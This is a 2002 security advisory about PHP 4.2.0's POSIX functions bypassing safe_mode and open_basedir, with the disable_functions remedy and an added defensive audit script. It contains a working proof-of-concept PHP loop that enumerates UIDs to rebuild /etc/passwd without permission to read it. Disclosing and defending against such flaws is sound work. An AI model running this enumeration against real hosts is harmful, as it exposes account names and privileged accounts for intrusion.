[UNIX] Posix_getpw* Ignores Safe_mode and Open_basedir Settings
From: support@securiteam.com  Date: 04/23/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 23 Apr 2002 21:12:24 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Posix_getpw* Ignores Safe_mode and Open_basedir Settings
------------------------------------------------------------------------
SUMMARY
posix_getpwnam() and posix_getpwuid() (see
<http://www.php.net/manual/en/ref.posix.php>) are two functions of PHP's
POSIX extension: the first returns the account record for a given user
name, the second the record for a given UID. Neither function honours the
safe_mode and open_basedir settings. A script running under those
restrictions can therefore harvest every field of /etc/passwd (user names,
UIDs and GIDs, GECOS data such as phone numbers, home directories and login
shells) without being allowed to read the file itself.
DETAILS
Vulnerable systems:
* PHP version 4.2.0
The posix_* functions do not check whether safe_mode or open_basedir
restrict what the calling script may access, so a user can rebuild a
complete copy of /etc/passwd without any permission to read /etc/passwd or
to enter the /etc directory.
This is dangerous on hosts where login names are kept secret: it tells a
user which accounts exist, which of them are privileged (UID 0, for
instance) and which have a valid login shell. For now the only remedy is to
disable these functions (the disable_functions directive in php.ini).
Example:
Here is a script that rebuilds /etc/passwd while safe_mode is enabled and
open_basedir is set to the user's home directory:
<?php
// Walk every UID that could plausibly exist and print the matching record
// in /etc/passwd format. posix_getpwuid() returns false for a UID with no
// entry; the @ suppresses the warning it raises in that case.
for ($i = 0; $i < 60000; $i++)
{
    if (($tab = @posix_getpwuid($i)) !== false)
    {
        echo $tab['name'] . ":";
        echo $tab['passwd'] . ":";
        echo $tab['uid'] . ":";
        echo $tab['gid'] . ":";
        echo $tab['gecos'] . ":";
        echo $tab['dir'] . ":";
        echo $tab['shell'] . "<br>";
    }
}
?>
On a very large system the loop may not finish before max_execution_time
expires. Fortunately PHP provides no posix_getpwent(), so the user cannot
simply walk the password database and has to try every possible UID.
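As an added example (not part of the original advisory), the following PHP script audits a host for the remedy the advisory recommends and shows a wrapper that reinstates the safe_mode-style ownership rule by hand, returning only the record of the UID the script itself runs as. It assumes the two functions have been disabled through the disable_functions directive in php.ini; the function names posixLookupsDisabled and ownPasswdEntry are this example's own.

```php
<?php
// Added example, not from the advisory. Audits whether posix_getpwnam() and
// posix_getpwuid() are disabled (the advisory's only remedy) and shows a
// wrapper that limits a lookup to the calling script's own UID.
//
// Assumed php.ini hardening for this example:
//   disable_functions = posix_getpwnam,posix_getpwuid

// Returns a map of function name => true when the function cannot be called
// from scripts, either because it is listed in disable_functions or because
// the POSIX extension is not compiled in at all. ini_get() is the
// authoritative check; function_exists() also reports false for disabled
// functions on PHP 5 and later.
function posixLookupsDisabled()
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $report   = array();
    foreach (array('posix_getpwnam', 'posix_getpwuid') as $fn) {
        $report[$fn] = in_array($fn, $disabled, true) || !function_exists($fn);
    }
    return $report;
}

// Mirrors the rule safe_mode applies to file access (the object's owner must
// match the UID the script runs as): only the calling process's own
// /etc/passwd record may be returned, never that of an arbitrary UID.
// Returns false if the lookup is refused or the functions are disabled.
function ownPasswdEntry($requestedUid)
{
    if (!function_exists('posix_geteuid') || !function_exists('posix_getpwuid')) {
        return false; // functions disabled or extension absent: nothing to leak
    }
    $self = posix_geteuid();
    if ((int) $requestedUid !== $self) {
        return false; // refuse the cross-account lookup the advisory exploits
    }
    return posix_getpwuid($self);
}

foreach (posixLookupsDisabled() as $fn => $off) {
    echo $fn . ': ' . ($off ? 'disabled' : 'CALLABLE - scripts can enumerate /etc/passwd') . "\n";
}

// A lookup of root is refused unless the script itself runs as root; a lookup
// of the script's own UID is the only one the wrapper ever answers.
$root = ownPasswdEntry(0);
echo 'lookup of UID 0: ' . ($root === false ? 'refused' : $root['name']) . "\n";
if (function_exists('posix_geteuid')) {
    $own = ownPasswdEntry(posix_geteuid());
    echo 'lookup of own UID: ' . ($own === false ? 'refused' : $own['name']) . "\n";
}
```

Run it from the same virtual host whose safe_mode and open_basedir settings are being relied on: if either function reports CALLABLE, the enumeration script above still works there regardless of those settings.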
ADDITIONAL INFORMATION
The information has been provided by <mailto:veins@skreel.org> veins.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.